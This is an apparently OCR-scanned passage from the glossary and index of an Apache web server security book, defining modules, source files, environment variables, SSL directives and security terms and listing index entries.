Appendix A, “Apache Security-Related Modules and Directives.” 


mod_usertrack A logging-related Apache module that offers user tracking with 
cookies. See Appendix A, “Apache Security-Related Modules and Directives.” 


mod_vhost_alias A URL-mapping Apache module that provides support for 
dynamic virtual hosting. See Appendix A, “Apache Security-Related Modules and 
Directives.” 
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mpm_common.c Apache server source file that contains mpm functions, as well as plat- 
form-specific packet and communication handling (BeOS, BSD, SvsV). Includes 
apr.h, apr_thread_proc.h, apr_signal.h, apr_strings.h, apr_lock.h, httpd.h, 
http_config.h, http_log.h, http_main.h, mpm.h, mpm_common.h, ap_mpm.h, 
ap_listen.h, scoreboard.h, pwd.h, and grp.h. 


mpm_winnt A core Apache module that that provides multiprocessing with a single 
control process, and a single server process with multiple threads for Windows NT. 
See Appendix A, “Apache Security-Related Modules and Directives.” 


multipart-alternative MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” Also see RFC 1521 for detailed discussion on this and other MIME- 
related issues: ftp://ftp.isi.edu/in-notes/rfc1521.txt. 


multipart-appledouble MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-byteranges MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-digest MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-encrypted MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-form-data MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-header-set MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-mixed MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-parallel MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-related MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-report MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-signed MIME multipart type. See Appendix D, “Apache API Quick 
Reference.” 


multipart-voice-message MIME multipart type. See Appendix D, “Apache API 
Quick Reference.” 
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netstat Command that shows current TCP/IP connections and their addresses. 
NetWare A popular network operating system from Novell, Inc. 


Network Information System (NIS) A Sun Microsystems system that enables 
hosts to transfer data repeatedly after authenticating themselves only once to a given 
network. Once called the Yellow Pages system. 


Network Interface Card (NIC) An Ethernet card. 


one-time password A password generated dynamically during a challenge- 
response exchange. OTP-enabled systems generate such passwords using a predefined 
algorithm but are highly secure, because they’re good for the current session only. 


owner User, host, or process with authorization to read, write, or otherwise access 
a given process, file, directory, user, or host. Generally, you as system administrator 
assign ownership, although your system may sometimes automatically assign it 
during an automated task. 


packets Data sent over networks is fragmented into manageable chunks called 
packets, or frames. The protocol used determines their size. 


path A file or directory’s location. Here is a path to the file passwd in the directory 
/etc: /etc/passwd. See $PATH. 


Perl Practical Extraction and Report Language, a programming language suited to 
network programming, text processing, and CGI. 


PGP Pretty Good Privacy, a public key-private key encryption system that offers 
high-grade encryption and privacy. Learn more about PGP at 
http: //web.mit.edu/network/pgp.htm1. 


PostScript A text, imaging, and printer language. PostScript documents express 
text and image geometry in a language that applications and printers understand. 


process A program or job that is currently running. See job. 


prompt Generally, in CLI-based systems, the $, #, >, or % symbol, which signals 
that your operating system is ready to accept commands. Less generally, a signal 
from your operating system or application that it’s waiting for input. 


protocol.c Apache server source file that contains functions that handle direct 
client-to-server communication, read client request lines, and read headers. Includes 
apr.h, apr_strings.h, apr_buckets.h, apr_lib.h, apr_signal.h, apr_want.h, 
util_filter.h, ap config.h, httpd.h, http_config.h, http_core.h, http_proto- 
col.h, http_main.h, http_request.h, http_vhost.h, http_log.h, util_charset.h, 
util_ebcdic.h, stdarg.h, and unistd.h. 


protocol analyzer Hardware or software that can monitor or intercept network 
traffic. 
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ps A Unix command that lists current processes. 


Python An object-oriented scripting language common to Linux distributions, but 
which you might also find elsewhere. You can use Python for CGI development. 


RAID Redundant Array of Inexpensive Disks, a large amount of connected hard 
drives that together act as one drive. Help with data redundancy, backups, and disas- 
ter recovery. 


read access When a user, group, or extenal users have read access only, they can 
read a particular file. 


read-only When a file is read-only, users can read it but not write to it. 
REMOTE_ADDR IP Environment variable that stores the client’s address. 
REMOTE_HOST Environment variable that stores the DNS name of client. 
REMOTE_IDENT Environment variable that stores the remote user ID. 


REMOTE_USER Environment variable that stores the remote authenticated user’s 
name. 


request.c Apache server source file that contains functions to receive and process 
client requests. Includes apr_strings.h, apr_file_io.h, apr_fnmatch.h, apr_want.h, 
ap_config.h, httpd.h, http_config.h, http_request.h, http_core.h, http_proto- 
col.h, http_log.h, http_main.h, util_filter.h, util_charset.h, mod_core.h, and 
stdarg.h. 


REQUEST_METHOD Environment variable that stores the HTTP request method the 
client’s using. 


RFC Requests for Comments (RFCs) are the working notes of the Internet develop- 
ment community. Engineers often use RFCs to propose new standards. Learn more at 
http: //www.rfceditor.org or at http://www.ietf.org/ (The Internet Engineering 
Task Force). 


root The superuser, or all-powerful administrative account in Unix. 


RSA RSA is the Rivest-Shamir-Adleman public key cryptographic algorithm and 
system. RSA is extremely popular because it can be seamlessly integrated into many 
applications, including mainstream applications like Netscape Communicator and 
Microsoft Internet Explorer. 


scoreboard.c Apache server source file that contains scoreboard functions, includ- 
ing those dealing with IPC. Includes apr.h, apr_strings.h, apr_portable.h, 
apr_lib.h, apr_want.h, sys/types.h, ap_config.h, httpd.h, http_log.h, 
http_main.h, http_core.h, http_config.h, ap_mpm.h, mpm.h, scoreboard.h, and 
apr_shmem.h. 
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Secure Socket Layer (SSL) A Netscape Communications security protocol that 
enables client/server applications to communicate free of eavesdropping, tampering, 
or message forgery. SSL is now used for secure electronic Web commerce. 


SERVER_BUSY_DNS An Apache Web server constant denoting that Apache is still 
waiting for a DNS lookup to complete. See Appendix D, “Apache API Quick 
Reference.” 


SERVER_BUSY_KEEPALIVE An Apache Web server constant denoting that Apache is 
servicing a persistent connection. See Appendix D, “Apache API Quick Reference.” 


SERVER_BUSY_LOG An Apache Web server constant denoting that Apache is writing 
to a log file. See Appendix D, “Apache API Quick Reference.” 


SERVER_BUSY_READ An Apache Web server constant denoting that Apache is reading 
a client request. See Appendix D, “Apache API Quick Reference.” 


SERVER_BUSY_WRITE An Apache Web server constant denoting that Apache is 
writing to a client. See Appendix D, “Apache API Quick Reference.” 


SERVER_DEAD An Apache Web server constant denoting that the server is now 
down. See Appendix D, “Apache API Quick Reference.” 


SERVER_GRACEFUL An Apache Web server constant denoting that the server is 
performing a “graceful” restart. See Appendix D, “Apache API Quick Reference.” 


SERVER_NAME Environment variable that stores the server’s hostname. 
SERVER_PORT Environment variable that stores the server’s port number. 


SERVER_PROTOCOL Environment variable that stores the protocol and version 
number. 


SERVER_SOFTWARE Environment variable that stores the server software name and 
version (in this case, Apache). 


SET (Secured Electronic Transaction) A standard of secure protocols associ- 
ated with online commerce and credit card transactions. Visa and MasterCard are the 
chief players in development of the SET protocol. Its purpose is ostensibly to make 
electronic commerce more secure. 


shadowing The practice of isolating encrypted password values so that they’re 
beyond an attacker’s reach. The passwords are still usable, but hidden from prying 
eyes. These typically reside in /etc/shadow on Unix. 


showmount A Unix program that displays exported file systems. 


S/Key Bellcore one-time password system that secures connections. In S/Key, pass- 
words never travel over the network, and therefore attackers cannot sniff them. See 
RFC 1760 for details: ftp://ftp.isi.edu/in-notes/rfc1760.txt. 
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sniffer Hardware or software that captures datagrams on a network. Users can 
deploy sniffers legitimately (to diagnose network problems), or illegitimately (to 
crack network passwords and subvert security and privacy). 


source (source code) Raw uncompiled program code that when compiled (or 
simply run) will constitute an application or program. 


SP3 Network Layer Security Protocol. 
SP4 Transport Layer Security Protocol. 


spoofing Procedure where a user or host impersonates another user or host to 
gain unauthorized access to a trusted or trusting target. 


SQL Structured Query Language (relation database query language). 
ssh Secure Shell, a program that encrypts Telnet-like remote sessions. 
ssh-agent Secure Shell’s authentication agent (Unix). 

ssh-keygen Secure Shell’s authentication key generator (Unix). 

sshd Secure Shell’s server (Unix). 


SSL_CIPHER Environment variable that specifies which cipher is being used. See 
Chapter 15, “Apache/SSL.” 


SSL_CLIENT_<x509> Environment variable that specifies the component of the 
client’s DN (Distinguished Name). See Chapter 15, “Apache/SSL.” 


SSL_CLIENT_CERT Environment variable that specifies the Base64 encoding of the 
client’s certificate. See Chapter 15, “Apache/SSL.” 


SSL_CLIENT_CERT_CHAIN_n Environment variable that specifies the Base64 encoding 
of the client’s certificate’s chain. See Chapter 15, “Apache/SSL.” 


SSL_CLIENT_DN Environment variable that specifies the DN (Distinguished Name) 
in the client’s certificate. See Chapter 15, “Apache/SSL.” 


SSL_CLIENT_I_<x509> Environment variable that specifies a component of the 
client’s issuer’s DN. See Chapter 15, “Apache/SSL.” 


SSL_CLIENT_I_DN Environment variable that specifies the DN of the client’s certifi- 
cate issuer. See Chapter 15, “Apache/SSL.” 


SSL_PROTOCOL_VERSION Environment variable that specifies what SSL version is 
being used. See Chapter 15, “Apache/SSL.” 


SSL_SERVER_<x509> Environment variable that specifies a component of the 
server’s DN. See Chapter 15, “Apache/SSL.” 
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SSL_SERVER_DN Environment variable that specifies the DN in the server’s certifi- 
cate. See Chapter 15, “Apache/SSL.” 


SSL_SERVER_I_<x509> Environment variable that specifies a component of the 
server's certificate issuer’s DN. See Chapter 15, “Apache/SSL.” 


SSL_SERVER_I_DN Environment variable that specifies the server’s certificate issue’s 
DN. See Chapter 15, “Apache/SSL.” 


SSL_SSLEAY_VERSION Environment variable that specifies what SSLeay version is 
being used. See Chapter 15, “Apache/SSL.” 


SSLBanCipher SSLBanCipher is the reverse of SSLRequireCipher. For arguments, it 
takes a comma-delimited list of ciphers that the server will reject. See Chapter 15, 
“Apache/SSL.” 


SSLCACertificateFile Use the SSLCACertificateFile directive to specify a file 
that contains not one but several certificates. See Chapter 15, “Apache/SSL.” 


SSLCACertificatePath Use the SSLCACertificatePath directive to specify from 
what certificate authorities you’ll accept a client’s certificate. See Chapter 15, 
“Apache/SSL.” 


SSLCacheServerPath Use the SSLCacheServerPath directive to specify a path to the 
global cache server. See the server documentation for more information. See Chapter 
15, “Apache/SSL.” 


SSLCacheServerPort Use the SSLCacheServerPort directive to specify a port for the 
cache server. See the server documentation for more information. See Chapter 15, 
“Apache/SSL.” 


SSLCacheServerRunDir Use the SSLCacheServerRunDir directive to specify the 
directory in which your cache server runs. See the server documentation for more 
information. See Chapter 15, “Apache/SSL.” 


SSLCertificateFile Use the SSLCertificateFile directive to specify the location 
of your single certificate file (*.pem). See Chapter 15, “Apache/SSL.” 


SSLCertificateKeyFile Use the SSLCertificateKeyFile directive to specify the 
location of your private key file. See Chapter 15, “Apache/SSL.” 


SSLDisable Use the SSLDisable directive to turn off SSL. This is useful when you 
have multiple virtual hosts, and some need SSL and others don’t. See Chapter 15, 
“Apache/SSL.” 


SSLEnable Use the SSLEnable directive to turn on SSL. This is useful when you 
have multiple virtual hosts, and some need SSL and others don’t. See Chapter 15, 
“Apache/SSL.” 
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SSLRequireCipher Use the SSLRequireCipher directive to specify a cipher or 
ciphers that a client must conform to in order to transact. This is the reverse of 
SSLBanCipher. For arguments, it takes a comma-delimited list of ciphers that the 
server will accept. See Chapter 15, “Apache/SSL.” 


SSLVerifyClient Use the SSLVerifyClient directive to set your servers paranoia 
level. Levels run from O (no certificate at all required) to 3 (the client must present at 
the least a valid certificate). See Chapter 15, “Apache/SSL.” 


standard error (STDERR) Error output from programs. STDOUT typically prints 
directly to your terminal screen in real-time. However, you can redirect this output 
elsewhere if you wish. 


standard input (STDIN) Your commands are standard input. Your operating 
system reads commands (which you express in text) from your terminal and/or 
keyboard. 


standard output (STDOUT) Output from computer programs. STDOUT usually 
prints to your terminal in real-time, but you can redirect this elsewhere if you wish. 


sudo A Unix program that enables system administrators to assign users the power 
to execute select commands as the superuser. 


sysklogd A system logging server in Unix that logs system and kernel messages. 


Tcl A scripting language that, when used in conjunction with tk, can be used to 
create complex graphical applications. 


tcpd Logs (and can allow or deny) telnet, finger, ftp and other connections on 
Unix platforms. 


tcpdchk Verifies that your tcp_wrapper configurations and allow/deny access rules 
are correct. 


tcpdump A network-monitoring tool. 


Telnet authentication option Protocol options for Telnet that add basic secu- 
rity to Telnet-based connections, based on rules at the source routing level. See RFC 
1409 for details: ftp://ftp.isi.edu/in-notes/rfc1409.txt. 


TEMPEST Transient Electromagnetic Pulse Surveillance Technology, the practice 
and study of capturing/eavesdropping on electromagnetic signals that emanate from 
electronic devices. TEMPEST shielding is where a computer system is armored to 
prevent emissions, and is thus designed to defeat such eavesdropping. 


traffic analysis Traffic analysis is the study of patterns in communication, rather 
than the communication’s actual content. For example, studying when, where, and 
to whom particular messages are being sent, instead of studying the content of those 
messages. 
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TripWire An add-on file integrity checker. 


trojan horse A code or application that, unbeknownst to the user, performs 
surreptitious and unauthorized tasks that can compromise system security. 


trusted system A secure operating system for use in environments where classi- 
fied information is warehoused. 


UID UserID. 


UPS (Uninterruptible Power Supply) A backup power supply for when your 
primary power source fails. 


user ID Generally, any value by which a user is identified, including their user 
name. Specifically in relation to multi-user environments, any process ID—typically 
a numeric value—that identifies a process’s owner. 


util.c Apache server source file containing functions that handle strings (and one 
that declares the Rob owed Roy a beer. I wonder if he ever squared up?) Includes 
apr.h, apr_strings.h, apr_lib.h, apr_want.h, unistd.h, netdb.h, ap_config.h, 
apr_base64.h, httpd.h, http_main.h, http_log.h, http_protocol.h, http_config.h, 
util_ebcdic.h, pwd.h, grp.h, and test_char.h. 


util_charset.c Apache server source file referencing functions that handle 
charset conversion (ISO-8859-1, ASCII, HDRS). Includes ap_config.h, httpd.h, 
http_log.h, http_core.h, and util_charset.h. 


util_debug.c Apache server source file containing functions to allow for and 
handle module-specific data handling. Includes apr_want.h, httpd.h, and 
http_config.h. 


util_ebcdic.c Apache server source file containing functions that handle charset 
conversion (ISO-8859-1, ASCII, HDRS). Includes ap_config.h, apr_strings.h, 
httpd.h, http_log.h, http_core.h, and util_ebcdic.h. 


util_filter.c Apache server source file containing functions that handle bucket- 
to-filter management. Includes apr_want.h, apr_lib.h, apr_hash.h, apr_strings.h, 
httpd.h, http_log.h, util_filter.h, and apr_hooks.h. 


util_md5.c Apache server source file containing a module interface to the digest 
algorithm MDS. Includes ap_config.h, apr_portable.h, apr_strings.h, httpd.h, 
util_md5.h, and util_ebcdic.h. 


util_script.c Apache server source file containing functions that handle script 
idenitification and validation (and also, prevent malicious scripts from capturing 
passwords). Includes Includes apr.h, apr_lib.h, apr_strings.h, apr_want.h, 
stdlib.h, ap_config.h, httpd.h, http_config.h, http_main.h, http_log.h, 
http_core.h, http_protocol.h, http_request.h, util_script.h, apr_date.h, 
util_ebcdic.h, and os2.h. 
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util_time.c Apache server source file that implements a cache for the exploded 
values of recent timestamps. Includes util_time.h. 


util_xml.c Apache server source file containing functions to handle XML requests. 
Includes apr_xml.h,httpd.h, http_protocol.h, http_log.h, http_core.h, and 
util_xml.h. 


vhost.c Apache server source file containing functions to handle virtual host 
address configuration and runtime issues. Includes apr.h, apr_strings.h, apr_lib.h, 
apr_want.h, ap_config.h, httpd.h, http_config.h, http_log.h, http_vhost.h, 
http_protocol.h, http_core.h, and arpa/inet.h. 


Virtual Private Network (VPN) A closed, private network and secure circuit 
over intranet or Internet lines where transitory data is encrypted and passed only 
between trusted points. 


vulnerability (hole) A system weakness (in either hardware or software) that 
allows intruders to gain unauthorized access or deny service. 


write access When a user, group, or public users have write access, it means that 
she has permission and privileges to write to a particular file or directory. 


Index 


Symbols 


3-Way block cipher, 422 
3Com OfficeConnect firewall, 410 
80/20 rule, 73-74 


A 


ab tool (Apache HTTP Server Benchmarking), 
161-162 


arguments, 163 
options, 163 
absolute paths, 271-273 
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testing, 210 

time-based, 217-218 

tools, 383 

virtual hosts, 222 
access log (HTTP), 175-176 
access.conf file, 211-212 
AccessFileName directive 

htpasswd tool, 475 
accessibility, media, 62-63 
accounts 

Oracle, 97 

shell (Unix), 78 
ACL (Access Control Lists), 141 
AddHandler directive, 584 
adding permissions (Unix), 138 
addresses, IPv6, 125-126, 129 
administration, 135 

example security issues, 505-553 
administrator e-mail, specifying, 500 
Advanced TCP/IP settings dialog box, 398 
Alias directive, 144 
AliasMatch directive, 144 
AllowCONNECT directive (mod_proxy), 378 
AllowOverride directive, 476 
amd service, 49 
Analog (logging tools), 200 
analyzing packets, 371 
Anonymous_Authoritative directive, 477 
Anonymous directive, 476 
Anonymous_LogEmail directive, 477 
Anonymous_MustGiveEmail directive, 478 
Anonymous_NouUserlD directive, 478 
anonymous users, 23 


security, 490 


Anonymous_VerifyEmail directive, 478 
anti-theft devices, 66 

laptops, 66 
AOL Instant Messenger, risks, 49 
Ap_log_error function, 170 
Ap_log_perror function, 170 
Ap_log_rerror function, 171 
Apache 

API 

constants, 588-595 
quick reference, 575, 581-594 

history, 109-110 

proxy tools, 409 

vulnerability, 44-45 
Apache C source files, 312, 314 

associations, 314-334 
Apache-DBlLogConfig (logging tools), 195 
Apache-DBlLogger (logging tools), 195 
Apache-DebugInfo (logging tools), 195 
Apache-LogFile (logging tools), 196 
Apache-ParseLog (logging tools), 196 
Apache-SSL, 349-350 

directives, 366-367 

environment variables, 365 

fine-tuning, 365 

installing, 349-350 
Apache-Wombat (logging tools), 196 
apachectl tool, 161 

options, 164 
API (Application Programming Interface), 27 
APLOG_ALERT log constant, 172 
APLOG _CRIT log constant, 172 
APLOG_DEBUG log constant, 172 
APLOG_EMERG log constant, 172 


APLOG_ERR log constant, 172 
APLOG_INFO log constant, 172 
APLOG_LEVELMASK log constant, 172 
APLOG_NOTICE log constant, 172 
APLOG_WARNING log constant, 172 
APLOG_WIN32ERROR log constant, 172 
application gateways (firewalls), 373 

Firewall Tool Kit (FWTK), 373 

Trusted Information Systems (TIS), 373 
Application Programming Interface. See API 
application-level, 20 
application-proxy firewalls, 373 
applications 

resource allocation, 586-588 

Web Server risks, 49 

writing, 586, 588 
apxs tool, 161, 164 

options, 165-166 
arguments, ab tool, 163 
Ashley Laurent BroadWay firewall, 410 
ASP, 255 
assessing risks, 33 
assigning permissions (Unix), 138 
associations, Apache C source files, 314-334 
attack signatures, 372 
attributes, xinetd, 393-396 
auth_ip tool (authentication), 250 
auth_Idap tool (authentication), 250 


auth_oracle module tool (authentication), 
250 


AuthAuthoritative directives, 479 
AuthDBMaAuthoritative directive, 480 
AuthDBMuUserFile directive, 480 
AuthDBUuUserFile directive, 481 
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authentication, 225, 579 


auth_ldap tool, 250 
auth_oracle_module tool, 250 
cryptographic, 248-249 
DBM-file, 239-247 
digest-based, 225 
digital certificates, 225 
directories, 233-235 
fingerprints, 248-249 
groups, 237-238 
holes, 253 
htdigest system, 492 
HTTP, 238-239 
Inst_auth_module tool, 250 
IPSEC, 122-125 
IPv6, 120 
Kerberos Authentication tool, 250 
LDAP directory, 493-494 
MDS, 249-250 
MDS cookie, 250 
message digest, 248-249 
mod_auth, 226-232 
mod_auth external tool, 250 
mod_auth_mysq] tool, 251 
mod_auth_nds tool, 251 
mod_auth_notes tool, 251 
modules, 579 
passwords, 225 

files, 310 
possible problems, 253 
SSL, 250 
tools, 250-251 
usernames, 225 
users, 226-227, 229-230, 232 
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AuthGroupFile directive, 481 
AuthLDAPAuthoritative directive, 481 
AuthName directive, 482 
authoring code, 256-257 
authorization, DBM files, 491 
authorizing 

hosts, 212-213 

information, 481 
AuthType directive, 482 
AuthUserFile directive, 482 
avoiding 

buffer overflows, 263 

buffer overruns, 267-270 

gets(), 268 

metacharacters, 258 

open(), 265 

path risks, 294 

popen(), 260 

relative paths, 271-273 

specific functions, 257 


awk language, 255 


B 


bandwidth 
controlling clients, 157-161 
restricting, 157-161 
bash environment variables, 261-264 
BASIC language, 255 
Berkeley DB-2 files, 239-244, 246 
biometric identification, 63 
FICS, 64-65 
retina, 64-65 


Web resources, 65 


BIOS 
entry keys, 60-61 
passwords, 60 
cracking, 62 
blanket logging, 181 
block ciphers, 422 
3-Way, 422 
Blowfish, 422 
CAST, 422 
DEAL, 423 
DES, 423, 426 
FEAL, 423 
GOST, 423 
IDEA, 423 
LOKI91, 423 
Lucifer, 423 
RC2, 423, 426 
resources, 424 
SAFER, 424 
SQUARE, 424 
TEA, 424 
blocking 
access (time-based), 217-218 
connections, 214 
content, 371 
hosts, 214 
protocol, 371 
Blowfish block cipher, 422 
boot security, 62-63 
disabling, 62 
boot sequences, 62-63 
bootparamd service, 49 
boundary checking, buffers, 267-270 


breaches 
defacement, 45-46 
DoS, 44 
examples, 37 
Microsoft example, 38 
permissions, 135 
scenarios, 41-43 
Secure Root example, 35 
statistics, 34-40 
TASC example, 35 
buffers 
defining, 499 
overflows, 263 
overruns, 267-270 
building 


extension modules, 164 


C 


C (random numbers), 343 


C source files. See Apache C source files, 
314-334 


CAST block cipher, 422 
causing buffer overruns, 267-270 
certificate authorities, 367 
certificates 
digital, 225 
generating, 355-359 
CGI (Common Gateway Interface), 24, 494 
directories, 271-273 
files, 271-273 
Last Lines, weakness, 76 
passing environment variables, 495 
paths, 271-273 
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resources, 288 

scripts, running as users, 166 

security risks, 257 

support, 255, 496 
changing permissions 

Unix, 138 
Windows, 141-142 

chdir(), 273 
Check Point SecureServer firewall, 410 
child processes 

constants, 189 

limiting CPU resources, 160 

serialization, 158 
chmod (Unix permissions), 138 
Chrysalis-ITS Luna firewall, 411 
CIFS (Common Internet File System), 56 
ciphers, 419, 421 

Apache-supported, 428 

block, 422 

DES, 425 

ROT-13, 420 

substitution, 420 
Cisco 7200 firewall, 411 
clean up, 587 
client certificates (SSL), 250 
client-server model, MySQL, 90 
client-side languages, limited security, 295 
client-side programming, 291 

exposed source code, 292-294 

JavaScript, 291 

Jscript, 291 

risks, 294 

security issues, 295 

VBScript, 291, 301 
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line size, 160 

restricting request body size, 159 
COBOLScript, 255 
Cocentrix XO firewall, 411 
code, intruder risk, 33 
coding proprietary databases, 88-89 
ColdFusion, 255 
command interpreters. See shells 
command tables, 434-435 
commands 

executing within C, 258-259, 261 

NETBIOS, 52 

open(), 264-265 
commerce, Web-based, 338 
commercial databases, 96 
commercial firewalls, 409-416 

vendors, 417-418 
commercial SSL packages, 368-369 
common risks, 116 
communicating (Web-based), 338 
comparing 

commercial firewalls, 413 

IP filtering with firewalls, 397-401 
compiling (OpenSSL), 350-353 
Computer Crime and Security Survey, 34 
Computer Security Institute (CSI), 34-40 
conditional logging, 191, 193 
conditional processing, 285-286 
confidentiality (IPv6), 120 
configuration (access control), 218-219 
configuring xinetd, 392 
CONNECT method (<Limit> directive), 471 
connections, blocking, 214 


console passwords, 60 


constants 

list, 588-595 

logs, 171-172 

piped logs, 189 
content blocking, 371 
content handlers, 434-435 
controlling 

bandwidth, 157-161 

resources, 157-161 
conventions, naming, 292-293 
CookieExpires directive, 483 
CookieLog directives, 483 
cookies 

setting expire time, 483 

tracking, 483 
CookieTracking directives, 483 
COPY methods (<Limit> directive), 471 
correcting URL spelling, 157 
CPU resources, limiting, 160 
crackers, finger directive, 47 
cracking BIOS passwords, 62 
creating 

modules, 436 

network topology, 59 
credit card data, 337 


cross-site scripting (third-party servers), 
296-297 


examples, 296-297 
cryptographic authentication, 248-249 
cryptography, 419 

random numbers, 338-342 

SSL, 344-346 
customizing 

httpd logs, 184-185 

syslog, 180-183 


CustomLog directive, 484 
Cylink NetHawk firewall, 412 


D 


Data Encryption Standard. See DES 
Data Fellows F-Secure firewall, 412 
database management system. See DBMS 
databases 

commercial, 96 

general security, 104 

htdigest, 249-250 

htpasswd, 234 

Informix, 102-104 

MySQL, 89, 92-94 

Oracle, 96-97 

performance, 90-92 

PostgreSQL, 95-96 

proprietary, 88-89 

servers, 104 

support, 87 

Web interaction, 256 
DBM-file, 239-246 

authorization, 247, 491 

dbmmanage, 246-247 
dbmmanage 

DBM files, 246-247 

options, 246-247 
DBMS (database management system), 88-89 
DEAL block cipher, 423 
defacement, 45-46 
default handlers, 585 
defining network buffer size, 499 
DELETE method (Limit directives), 471 
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demanding authentication, 225 
denial-of-service (DoS), 44 
denial-of-service attacks, 24 
denying 
hosts, 214-215 
user access, 203 
DES (Data Ecryption Standard), 425 
authentication, 337 
input blocks, 426 
padding, 426 
permutations, 426 
DES block cipher, 423 
developing 
command tables, 434-435 
content handlers, 434-435 
modules, 431-432, 436 
examples, 455-461 
functions, 436 
mod_auth_ip, 455-461 
mod_fortress example, 436-453 
mod_random, 462-464 
resources, 466-467 
dhcpd service, 49 
digest-based authentication, 225 
digital certificates, 225 
Digital Signature Standard. See DSS 
directives 
AllowOveride, 476 
Anonymous, 476 
Anonymous_Authoritative, 477 
Anonymous_LogEmail, 477 
Anonymous_MustGiveEmail, 478 
Anonymous_NoUserlD, 478 
Anonymous_VerifyEmail, 478 
Apache-SSL, 366-367 
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AuthAuthoritative, 479 
AuthDBMAuthoritative, 480 
AuthDBMUserFile, 480 
AuthDBUserFile, 481 
AuthGroupFile, 481 
AuthLDAPAuthoritative, 481 
AuthName, 482 
AuthType, 482 
AuthUserFile, 482 
CookieExpires, 483 
CookieLog, 483 
CookieTracking, 483 
CustomLog, 484 

full list, 597-621 
IdentityCheck, 484 
<Limit>, 471-472 
<LimitExcept>, 473 
LimitRequestBody, 485 
LimitRequestFields, 485 
LimitRequestFieldsize, 486 
LimitRequestLine, 486 
LimitXMLRequestBody, 486 
LockFile, 487 

LogFormat, 487-488 
mod_access, 488 
mod_auth, 489 
mod_auth_anon, 490 
mod_auth_db, 491 
mod_auth_dbm, 491 
mod_auth_digest, 492 
mod_auth_ldap, 493-494 
mod_cgid, 494 


mod_proxy, 377 
mod_suexec, 496 
mod_unique_id, 497 
mod_user_track, 497 
mod_userdir, 155-156 
PassEnv, 497 

PHP safe mode, 279 
PidFile, 498 
ProxyBlock, 498 
ProxyDomain, 498 
ProxyReceiveBufferSize, 499 
ProxyRemote, 499 
ProxyRequests, 499 
ProxyVia, 499 
RewriteCond, 151 
security, 471 
ServerAdmin, 500 
ServerAlias, 500 
ServerName, 501 
ServerPath, 501 
ServerRoot, 501 
ServerSignature, 502 
SSL, 347-348 

User, 502 

UserDir, 503 
<VirtualHost>, 474 


directories 


access control, 24 

CGI, 271-273 

indexing, 221 

mapping, 155-156 

password protecting (htpasswd), 233-235 


mod_env, 495 directory mapping, 143-146 
mod_include, 495 disable functions (PHP), 279-281 
mod_log_config, 496 


disabling 

boot options, 62 

functions, 279-281 
domain names, access control, 207 
DoS (denial-of-service), 44 

attacks, 44 

examples, 44-45 

Windows vulnerabilities, 83-85 
DSS (Digital Signature Standard), 338 


dynamic content, modules, 580 


E 


e-commerce, 337 

e-mail 
as passwords, 478 
specifying administrator, 500 
using as password, 477 


embedding external language interpreters, 
465 


employee turnover, 117 
enabling proxy server, 499 
encrypted sessions, 24 
encryption, 42 

DES, 425 

MDS, 427 

SSL, 337-338, 427 
enforcing controls, 203 
entry keys (BIOS), 60-61 
environment, PHP, 275, 278 
environment variables 

access control, 215-217 

Apache-SSL, 365 

bash, 261-264 


examples 


requests, 497 
Unix shells, 76-77 
Windows, 79-85 
error log, 177-183 
LogLevel directive, 184 
setting location, 178 
ErrorLog directive, 177-183 
errors (programming), 255 
escapeshellarg(), 282 
escapeshellcmb(), 282 
establishing 
NOC, 58 
PHP safe mode, 278-279 
proxy servers, 382 
eval 
Perl, 266 
shells, 266 
evaluating access, 204-210 
evidence, logging, 170 


examples 
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Apache administrative issues, 505-553 
Apache API constants, 588-595 
Apache security issues, 505-553 
Apache version problems, 111-115 
basic Apache transactions, 575 
cross-site scripting, 296-297 
defacement, 45-46 

DoS (denial-of-service), 44-45 
error logs, 178 

IPv6 implementations, 132-133 
JavaScript third-party attacks, 299 
Melissa worm, 83 

module developing, 436-464 
module development, 455-461 


permissions security breaches, 135 
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piped logging, 188 

security breaches, 37-38 

TCP Wrappers, 383-387 

total system seizure, 45-46 

URI handling, 576, 578 

VBScript security issues, 301 
EXCEPT operators, hosts options, 388 
exclusive screening, 213-214 
exec() (Perl), 266 
ExecCGI option, 219 
execute permissions (Unix), 136 
expiration, setting cookie times, 483 
exposed source code, 292-294 
extensibility, 26 

positives, 27 
extension modules 

building, 164 

installing, 164 


external language interpreters, 465 


F 


FEAL block cipher, 423 


FICS (Fingerprint Image Compression 
Standard), 64-65 


fields 
IP Authentication Header Protocol, 122 
limiting clients, 159 
file mapping, 143-146 
file associations (C source files), 314-334 
File Transfer Protocol. See FTP 
files 
access control, 24, 211-212 
Apache C source, 312, 314 


CGI, 271-273 
DBM, 239-240, 242-246 
htaccess, 235-237 
HTTP Access Log, 175-176 
logs, 185-186 
open(), 264-265 
password authentication, 305, 310 
security, 311, 313 
filtering packets, 371 
fine-tuning Apache-SSL, 365 
finger directive, 47 


Fingerprint Image Compression Standard. 
See FICS 


fingerprints, 63, 248-249 
Firewall Tool Kit (FWTK), 373 
firewalls, 371 
Apache Proxies, 374-379 
application gateways, 373 
application-proxy, 373 
blocking 
content, 372 
protocol, 372 
commercial, 409-418 
gateways, 376 
IP filtering, 397-399, 401 
network-level, 372 
packets, 372 
proxy tools, 402, 405 
router-based, 373 
TCP Wrapper comparison, 390 
xinetd, 392 
flags, RewriteRule directive, 155 
Flash, 255 
flaws, Apache authentication, 253 


FollowSymLinks option (access control), 219 


formatting logs, 487-488 
FTP (File Transfer Protocol), 46 
proxy servers, 374-379 
function names, hackers, 292-293 
functions 
avoiding, 257 
committing source, 285-286 
disabling, 279-281 
password handling, 310 


G 


gateways, 376 

GDBM files, 239-246 

generating certificates, 355, 357-359 
generic, 20 

Genuity Advantage firewall, 413 
GET method (Limit directives), 471 
gets(), avoiding, 268 

gopherd service, 50 

GOST block cipher, 423 

granting access, 204-210 

group permissions (Unix), 138 


groups, authentication, 237-238 


H 


hackers, 255 
client-side programming, 292 
exposed source code, 292-294 
function names, 292-293 
hostnames, 292 
paths, 292-294 


htdigest tool 647 


user input, 270 
variable names, 292-293 
